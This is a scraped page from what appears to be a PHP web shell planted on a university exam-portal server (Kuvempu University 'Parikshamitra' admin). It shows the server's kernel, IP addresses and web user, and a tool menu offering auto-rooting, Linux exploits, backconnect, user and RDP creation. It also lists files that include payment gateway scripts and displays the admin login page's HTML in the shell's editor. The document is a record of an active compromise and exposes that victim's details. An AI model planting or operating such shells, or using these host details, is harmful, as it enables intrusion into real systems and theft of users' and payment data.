Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.16.251
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kus /
parikshamitra /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tarka_pdf
[ DIR ]
drwxr-xr-x
MainPage.html
5.85
KB
-rwxr-xr-x
MainPage_31012018.html
5.58
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
appForm.html
16.39
KB
-rwxr-xr-x
appStatus.html
7.48
KB
-rwxr-xr-x
appStatus_31012018.html
7.38
KB
-rwxr-xr-x
cconfig.php
1.75
KB
-rwxr-xr-x
chkResponse.php
434
B
-rwxr-xr-x
createUser.html
2.04
KB
-rwxr-xr-x
index.html
5.11
KB
-rwxr-xr-x
payment_gateway.php
7.78
KB
-rwxr-xr-x
paymentresponce.php
10.12
KB
-rwxr-xr-x
pgResponse.php
9.92
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <title>Sign In | Parikashamitra Admin</title> <!-- Favicon--> <link rel="icon" href="favicon.png" type="image/png"> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Roboto:400,700&subset=latin,cyrillic-ext" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css"> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap.css" rel="stylesheet"> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Animation Css --> <link href="plugins/animate-css/animate.css" rel="stylesheet" /> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="css/themes/all-themes.css" rel="stylesheet" /> <!-- Custom Css --> <link href="css/style.css" rel="stylesheet"> </head> <body class="theme-cyan"> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid"> <div class="navbar-header"> <a href="javascript:void(0);" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar-collapse" aria-expanded="false"></a> <a href="javascript:void(0);" class="bars"></a> <h2 class="nhdr m-t--5">KUVEMPU UNIVERSITY</h2> <h3 class="nhdr2 m-t--5 m-b--5">PARIKSHAMITRA ADMIN</h3> </div> </div> </nav> <!-- #Top Bar --> <section class="content"> <div class="container-fluid"> <div class="row clearfix m-t-100"> <div class="col-md-offset-2 col-lg-5 col-md-5 col-sm-6 col-xs-12 p-r--10"> <div class="card"> <div class="header bg-cyan"> <h2> Login </h2> </div> <div class="body"> <div class="form-horizontal"> <div class="row clearfix"> <div class="col-lg-4 col-md-4 col-sm-4 col-xs-5 form-control-label p-b-20"> <label class="pull-center" for="username">Username</label> </div> <div class="col-sm-4 col-md-7"> <div class="form-group"> <div class="form-line"> <input type="text" class="form-control" id="username" name="username" placeholder="username" required autofocus> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-lg-4 col-md-2 col-sm-4 col-xs-5 form-control-label p-b-20"> <label class="pull-center" for="Password">Password</label> </div> <div class="col-sm-4 col-md-7"> <div class="form-group"> <div class="form-line"> <input type="password" id="password" name="password" class="form-control" placeholder="password" /> </div> </div> </div> </div> <div class="row"> <div class="col-lg-offset-8 col-md-offset-2 col-sm-offset-4 col-xs-offset-5 col-md-3"> <button class="btn btn-primary waves-effect m-l-15" name="login" onclick="login()" id="login">SIGN IN</button> </div> </div> </div> </div> </div> </div> </div> </div> </section> <!-- Jquery Core Js --> <script src="plugins/jquery/jquery.min.js"></script> <script src="libs/jquery.blockUI.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <!-- Validation Plugin Js --> <script src="plugins/jquery-validation/jquery.validate.js"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <script src="js/login.js"></script> </body> <script type="text/javascript"> $(document).ready(function () { var inputs = $('input').keypress(function (e) { if (e.which == 13) { e.preventDefault(); var nextInput = inputs.get(inputs.index(this) + 1); if (nextInput) { nextInput.focus(); } } }); }); </script> </html>
Close